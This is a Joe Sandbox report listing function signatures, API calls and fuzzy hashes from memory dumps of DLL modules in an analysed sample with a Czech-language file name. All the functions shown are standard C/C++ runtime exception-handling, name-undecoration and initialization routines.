                                                          • Opcode ID: 675df0e8f9bd3718a469214980d2feff9f8236bac0195936a58b37703542a62e
                                                          • Instruction ID: c225a4d3888ab0e1c7c01702e285b03cb0adf759031350dd4f11a842f65c595f
                                                          • Opcode Fuzzy Hash: 675df0e8f9bd3718a469214980d2feff9f8236bac0195936a58b37703542a62e
                                                          • Instruction Fuzzy Hash: F82167B1901314DBDB40AF54D884F8ABBA8FF04314F120664EC54AB286D775FC86CBE2
                                                          APIs
                                                          • _FindAndUnlinkFrame.VCRUNTIME140(?,6FDF3987), ref: 6FDF39AD
                                                          • _IsExceptionObjectToBeDestroyed.VCRUNTIME140(?,6FDF3987), ref: 6FDF39FF
                                                          • __DestructExceptionObject.VCRUNTIME140(?,?,6FDF3987), ref: 6FDF3A14
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: ExceptionObject$DestroyedDestructFindFrameUnlink
                                                          • String ID: csm
                                                          • API String ID: 1567117672-1018135373
                                                          • Opcode ID: 5164f4a61ec40da724820d36c6a79c2b0ca77726b939c5fffe7c88a1c1d6fb9a
                                                          • Instruction ID: b07860585e614992c7ed921e5493e5da75dba3e2f56dcb77be015450b3b6f840
                                                          • Opcode Fuzzy Hash: 5164f4a61ec40da724820d36c6a79c2b0ca77726b939c5fffe7c88a1c1d6fb9a
                                                          • Instruction Fuzzy Hash: 77012838803304EFCB649F62D502E6EB7B5AF00216B53552EDC522A690CB31F686CA63
                                                          APIs
                                                          • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6FDF2D55
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: terminate
                                                          • String ID: MOC$RCC$csm
                                                          • API String ID: 1821763600-2671469338
                                                          • Opcode ID: 798e92e7c3d26e306f3f5f99b31a1f3c19eeafae3f69df68ca3e282df59fa8ad
                                                          • Instruction ID: 04d0d90739ff076e2cb8bf35e5c6b93e90aa9294a8ade0bad46447f27189080c
                                                          • Opcode Fuzzy Hash: 798e92e7c3d26e306f3f5f99b31a1f3c19eeafae3f69df68ca3e282df59fa8ad
                                                          • Instruction Fuzzy Hash: C9F0F839402315DFCB545F65CA01D8ABBA8FF4222EB2300AAD81497161C7B8F952CBE6
                                                          APIs
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6FDFB7FF
                                                            • Part of subcall function 6FDFF710: __FindPESection.LIBCMT ref: 6FDFF769
                                                          • __telemetry_main_return_trigger.VCRUNTIME140(?,6FDFE0C5,?,?,6FDFE0C5,?,00000001), ref: 6FDFB815
                                                          • __DestructExceptionObject.VCRUNTIME140(?,6FDFE0C5,?,00000001), ref: 6FDFB81B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: CurrentDestructExceptionFindImageNonwritableObjectSection__telemetry_main_return_trigger
                                                          • String ID: csm
                                                          • API String ID: 1907827047-1018135373
                                                          • Opcode ID: 5554f94e95c2bb492647ffa62783d09f1b6aa119f614b8b60935c3acc52e3ce7
                                                          • Instruction ID: ee305efbbc57ba2baee67642c7f55a6e1ed9c482ebadd5d4fa732dfdbb812b13
                                                          • Opcode Fuzzy Hash: 5554f94e95c2bb492647ffa62783d09f1b6aa119f614b8b60935c3acc52e3ce7
                                                          • Instruction Fuzzy Hash: BBE0DF36007315EBEF001F80B801E883B99AB063B0F02802BE900D32808B327861CAA9
                                                          APIs
                                                          • __FindPESection.LIBCMT ref: 6FDFBC01
                                                          • VirtualQuery.KERNEL32(83000000,C5B665AE,0000001C,C5B665AE,?,?,?), ref: 6FDFBCE6
                                                          • __FindPESection.LIBCMT ref: 6FDFBD23
                                                          • __FindPESection.LIBCMT ref: 6FDFBD5D
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: FindSection$QueryVirtual
                                                          • String ID:
                                                          • API String ID: 2992484814-0
                                                          • Opcode ID: 63a88bf5c2b7090acfc78c38fb1b4cc827f931e2019a881be434aba53b3fc436
                                                          • Instruction ID: 252b5c99ce0af6a7c9fccd0840157ace36cfde0a7e6fba821b0792f12b6c2b2a
                                                          • Opcode Fuzzy Hash: 63a88bf5c2b7090acfc78c38fb1b4cc827f931e2019a881be434aba53b3fc436
                                                          • Instruction Fuzzy Hash: 0FA1B075E02706DFCB50CFA8C940A9EB7B5EB4A724F524269D815DB2D0D736F8228B90
                                                          APIs
                                                          • __EH_prolog3.LIBCMT ref: 6FDF7961
                                                          • UnDecorator::getSymbolName.LIBCMT ref: 6FDF79F3
                                                          • DName::operator+.LIBCMT ref: 6FDF7AF7
                                                          • DName::DName.LIBVCRUNTIME ref: 6FDF7B9A
                                                            • Part of subcall function 6FDF55D8: shared_ptr.LIBCMT ref: 6FDF55F4
                                                            • Part of subcall function 6FDF57D7: DName::DName.LIBVCRUNTIME ref: 6FDF5825
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Name$Name::$Decorator::getH_prolog3Name::operator+Symbolshared_ptr
                                                          • String ID:
                                                          • API String ID: 1134295639-0
                                                          • Opcode ID: ca919489705240a464a95b7d68ba2ae13465db09080fc5929176d56b9c579e4a
                                                          • Instruction ID: 4df512a33eb4a2008bf7e018ac9617c386abfd01df7184f9c0a8155b26ca606e
                                                          • Opcode Fuzzy Hash: ca919489705240a464a95b7d68ba2ae13465db09080fc5929176d56b9c579e4a
                                                          • Instruction Fuzzy Hash: BA714975D0670AEEDF81CFA4C480FDEBBB4AB4A324F56415AD814AB280D735B946CB60
                                                          APIs
                                                          • DName::operator+.LIBCMT ref: 6FDF80F8
                                                            • Part of subcall function 6FDF5314: __aulldvrm.LIBCMT ref: 6FDF5345
                                                          • DName::operator+.LIBCMT ref: 6FDF8059
                                                          • DName::operator=.LIBVCRUNTIME ref: 6FDF813D
                                                          • DName::DName.LIBVCRUNTIME ref: 6FDF816F
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Name::operator+$NameName::Name::operator=__aulldvrm
                                                          • String ID:
                                                          • API String ID: 2973644308-0
                                                          • Opcode ID: 48e6c245afde8c44b7d43aca55efc39026ae44f91536a2cd8fe17bb1d8d74320
                                                          • Instruction ID: 576e7f36d1e8d171f2216c1b6d900be0285bf662dee28078ac98b1b1be6436c0
                                                          • Opcode Fuzzy Hash: 48e6c245afde8c44b7d43aca55efc39026ae44f91536a2cd8fe17bb1d8d74320
                                                          • Instruction Fuzzy Hash: 0D617C75D06316DFDB40CFA9C840E9EBBB0BB46304F02825AE450AB290C771BA46CB91
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: EqualOffsetTypeids
                                                          • String ID:
                                                          • API String ID: 1707706676-0
                                                          • Opcode ID: 38584ea5e3f0bcb2bdcd95a26988dd38a07d0493eba6fec8afcf67d837ab5845
                                                          • Instruction ID: 353d7c1166d41a444bed0b824092b0403062053912abaa31d1c7a1e2a2290e18
                                                          • Opcode Fuzzy Hash: 38584ea5e3f0bcb2bdcd95a26988dd38a07d0493eba6fec8afcf67d837ab5845
                                                          • Instruction Fuzzy Hash: F451AD3594530ADFDF40EFA8C681DEEBBF1FF46214F12459AD890AB250D732B9068B50
                                                          APIs
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6FDFE03E
                                                          • _local_unwind2.VCRUNTIME140(?,000000FF), ref: 6FDFE135
                                                            • Part of subcall function 6FDFBAD0: __FindPESection.LIBCMT ref: 6FDFBC01
                                                          • _global_unwind2.VCRUNTIME140(?), ref: 6FDFE0CC
                                                          • _local_unwind2.VCRUNTIME140(?,?), ref: 6FDFE0D9
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: _local_unwind2$FindSection___except_validate_context_record_global_unwind2
                                                          • String ID:
                                                          • API String ID: 2858483165-0
                                                          • Opcode ID: d33fa127a7e227048eb4d5695752e5303a6dac0d039590cdf290c3005857dacc
                                                          • Instruction ID: d9302e3ae0745619dc9095023627217a882ba01b967dc7ce9bf938b9479df068
                                                          • Opcode Fuzzy Hash: d33fa127a7e227048eb4d5695752e5303a6dac0d039590cdf290c3005857dacc
                                                          • Instruction Fuzzy Hash: 2031C6739013089BDB50DF69DC80EAAB7A5FF44364F068165ED198B285E731FA26C7E0
                                                          APIs
                                                          • __RTC_Initialize.LIBCMT ref: 73D61365
                                                            • Part of subcall function 73D616C0: InitializeSListHead.KERNEL32(73D640A0,73D6136F,73D63580,00000010,73D61300,?,?,?,73D61528,?,00000001,?,?,00000001,?,73D635C8), ref: 73D616C5
                                                          • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(73D630A4,73D630A8,73D63580,00000010,73D61300,?,?,?,73D61528,?,00000001,?,?,00000001,?,73D635C8), ref: 73D6137E
                                                          • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(73D6309C,73D630A0,73D63580,00000010,73D61300,?,?,?,73D61528,?,00000001,?,?,00000001,?,73D635C8), ref: 73D6139C
                                                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 73D613CF
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697594811.0000000073D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 73D60000, based on PE: true
                                                          • Associated: 00000012.00000002.1697568301.0000000073D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697616754.0000000073D63000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697658027.0000000073D65000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_73d60000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                          • String ID:
                                                          • API String ID: 590286634-0
                                                          • Opcode ID: 185d059769e854caf21e80cb8c29815e6e6fac88159c413ceb5fd89c12fe5856
                                                          • Instruction ID: b757aff95387caa4057355ca9f3d1b18f72d93a57d01f8c300e860a00c85dcc1
                                                          • Opcode Fuzzy Hash: 185d059769e854caf21e80cb8c29815e6e6fac88159c413ceb5fd89c12fe5856
                                                          • Instruction Fuzzy Hash: 7121D132A08B95DFEB01ABB4D40479C33B1AF122E6F14011AC8B77B1D1DB6A1059C676
                                                          APIs
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6FDFDF4E
                                                          • _global_unwind2.VCRUNTIME140(?), ref: 6FDFDFB5
                                                          • _local_unwind2.VCRUNTIME140(?,?), ref: 6FDFDFC2
                                                          • _local_unwind2.VCRUNTIME140(?,000000FF), ref: 6FDFE000
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: _local_unwind2$___except_validate_context_record_global_unwind2
                                                          • String ID:
                                                          • API String ID: 2485504424-0
                                                          • Opcode ID: 9d9bb3e35fbb533e372ac6e0f27e93a15b7f0a0cedb17f812234e18e255c726a
                                                          • Instruction ID: 8e5f614fc50c74ad39fa1c944767eb51bc7f1548dd02329901f1afe8954830b5
                                                          • Opcode Fuzzy Hash: 9d9bb3e35fbb533e372ac6e0f27e93a15b7f0a0cedb17f812234e18e255c726a
                                                          • Instruction Fuzzy Hash: 37218376502308DBCB40DF18D884EAAB765FF04370F464265ED559B285E731F961CBE0
                                                          APIs
                                                          • __EH_prolog3_catch.LIBCMT ref: 6FDF3A23
                                                          • unexpected.VCRUNTIME140(00000004,6FDF34A3,00000000,?,?,?,?), ref: 6FDF3A37
                                                            • Part of subcall function 6FDF4980: __telemetry_main_return_trigger.VCRUNTIME140 ref: 6FDF498F
                                                            • Part of subcall function 6FDF4980: terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6FDF4997
                                                          • _CxxThrowException.VCRUNTIME140(00000000,00000000,00000004,6FDF34A3,00000000,?,?,?,?), ref: 6FDF3A4B
                                                            • Part of subcall function 6FDF48A0: __telemetry_main_return_trigger.VCRUNTIME140(Bad dynamic_cast!,00000000,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF48D0
                                                            • Part of subcall function 6FDF48A0: RaiseException.KERNEL32(E06D7363,00000001,00000003,6FDF45E2,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF4900
                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000004,6FDF34A3,00000000,?,?,?,?), ref: 6FDF3A50
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Exception__telemetry_main_return_trigger$H_prolog3_catchRaiseThrowabortterminateunexpected
                                                          • String ID:
                                                          • API String ID: 2816766880-0
                                                          • Opcode ID: e4d491aaf5fd12ac46cfbe7a8db5bee62dfe298ad7d5fd5de941e036937283ff
                                                          • Instruction ID: 0f7d7f23f688f5a7c23b8dbfdf1c9cffe29880e28a5238f6438460801cdf59b5
                                                          • Opcode Fuzzy Hash: e4d491aaf5fd12ac46cfbe7a8db5bee62dfe298ad7d5fd5de941e036937283ff
                                                          • Instruction Fuzzy Hash: 80E0E275652305AED7C8ABA1D545F4936246F0272DF13814CE2054E2C1CBB1B142CB76
                                                          APIs
                                                          • Replicator::operator[].LIBCMT ref: 6FDFA0FA
                                                          • DName::DName.LIBVCRUNTIME ref: 6FDFA245
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: NameName::Replicator::operator[]
                                                          • String ID: ...
                                                          • API String ID: 3707554701-440645147
                                                          • Opcode ID: 96c51877f4a6def4caf7740142e77a2b1d7ae745b862f884ff5f3af69854c31e
                                                          • Instruction ID: 6e1787197ff3d6a139b8bac312de495f660d6d2523680a00697d6f6196c89b25
                                                          • Opcode Fuzzy Hash: 96c51877f4a6def4caf7740142e77a2b1d7ae745b862f884ff5f3af69854c31e
                                                          • Instruction Fuzzy Hash: 6A51AD76D4A746DEDB41CFA8C580EAABBF4AB4B304F02815ED451DB381C776B50ACB60
                                                          APIs
                                                          • DName::DName.LIBVCRUNTIME ref: 6FDF985D
                                                            • Part of subcall function 6FDF55D8: shared_ptr.LIBCMT ref: 6FDF55F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: NameName::shared_ptr
                                                          • String ID: amp$cpu
                                                          • API String ID: 2125921051-2542064945
                                                          • Opcode ID: 21933e6a10363ce2ab85177ccb70daddcf9baa4f04d2957c9102ab34e00cc337
                                                          • Instruction ID: 75ef95353da125efb7c0a24b5cd980dc220ef84731ef316935e358cb84da3c8d
                                                          • Opcode Fuzzy Hash: 21933e6a10363ce2ab85177ccb70daddcf9baa4f04d2957c9102ab34e00cc337
                                                          • Instruction Fuzzy Hash: 7831BC75D02309DFCB44CFA8C850EEE7BB8AF49318F12815AD455AB384CB30BA06CB91
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: NameName::
                                                          • String ID: A
                                                          • API String ID: 1333004437-3554254475
                                                          • Opcode ID: 95dfb35d4126a00df39201273d639f6d8d45dd74f0af843c4518f24fa8793556
                                                          • Instruction ID: 32e529683428f9a06a70b73b88c208b1a446d887e482e7b725880df922dfab2a
                                                          • Opcode Fuzzy Hash: 95dfb35d4126a00df39201273d639f6d8d45dd74f0af843c4518f24fa8793556
                                                          • Instruction Fuzzy Hash: 1221987490A708EECF80CFA8C840E9D7BB2FF47348F028199E4459B281C731BA578B52
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: NameName::Name::operator+=
                                                          • String ID: void
                                                          • API String ID: 2247604192-3531332078
                                                          • Opcode ID: 01d7a79b6b647321358df6014538ad7f66407a836b880ee08012d4ebf4f274fb
                                                          • Instruction ID: 3e96fb68807fc939b427001ccb87553a2d126ef9ee1353b83c209463db161082
                                                          • Opcode Fuzzy Hash: 01d7a79b6b647321358df6014538ad7f66407a836b880ee08012d4ebf4f274fb
                                                          • Instruction Fuzzy Hash: 12113DB5806319EACB44DFA8C845FEEBB78EF05314F42855AD411A7280DB70B746CBA0
                                                          APIs
                                                          • ___swprintf_l.LIBCMT ref: 6FDF50B4
                                                          • swprintf.LIBCMT ref: 6FDF50D7
                                                            • Part of subcall function 6FDFB717: __vswprintf_s_l.MSPDB140-MSVCRT ref: 6FDFB729
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l__vswprintf_s_lswprintf
                                                          • String ID: %lf
                                                          • API String ID: 391901838-2891890143
                                                          • Opcode ID: 740ad6c4508fb47d1460a737e6d22837ec8695ffead7b1349f343544caa6af5a
                                                          • Instruction ID: 705dedc8bd9d8ab67cb91bbb95c14d354df081e0a51dacb1ceba169546c68744
                                                          • Opcode Fuzzy Hash: 740ad6c4508fb47d1460a737e6d22837ec8695ffead7b1349f343544caa6af5a
                                                          • Instruction Fuzzy Hash: 29F0F0B5101209BBDB05AB85CC49FBF7F6CDF85298F024098F6451B280EB757E1193B2
                                                          APIs
                                                          • __telemetry_main_return_trigger.VCRUNTIME140(Bad dynamic_cast!,00000000,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF48D0
                                                          • RaiseException.KERNEL32(E06D7363,00000001,00000003,6FDF45E2,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF4900
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: ExceptionRaise__telemetry_main_return_trigger
                                                          • String ID: Bad dynamic_cast!
                                                          • API String ID: 201792006-2956939130
                                                          • Opcode ID: 209c97747a4f86bb8ff4ff0d9213ad23ee50a445ec043783dd9caaca21b8fc0d
                                                          • Instruction ID: aa00f8dc5135908be6fac34d2aac3e9ab9f8b93efa5b524a90c88bf33811ebe1
                                                          • Opcode Fuzzy Hash: 209c97747a4f86bb8ff4ff0d9213ad23ee50a445ec043783dd9caaca21b8fc0d
                                                          • Instruction Fuzzy Hash: 4F01BC75900308ABCB019F98C580B9EBBB9FF46314F12405AE911AB290D770E901CB90
                                                          APIs
                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,??_C,00000004,00000000,00000000,?,6FDFA449,00000000,00000000,?,00000000), ref: 6FDFA005
                                                          • DName::DName.LIBVCRUNTIME ref: 6FDFA04D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: NameName::strncmp
                                                          • String ID: ??_C
                                                          • API String ID: 3707088317-1959642359
                                                          • Opcode ID: 06cfa51467a09878a47ca7c94e90c433721d0199dc786df64acf31801f0e2657
                                                          • Instruction ID: 10a08155bace26bd8f7450c48febd7821eeb2a3fbc557c882d402a4903f902e3
                                                          • Opcode Fuzzy Hash: 06cfa51467a09878a47ca7c94e90c433721d0199dc786df64acf31801f0e2657
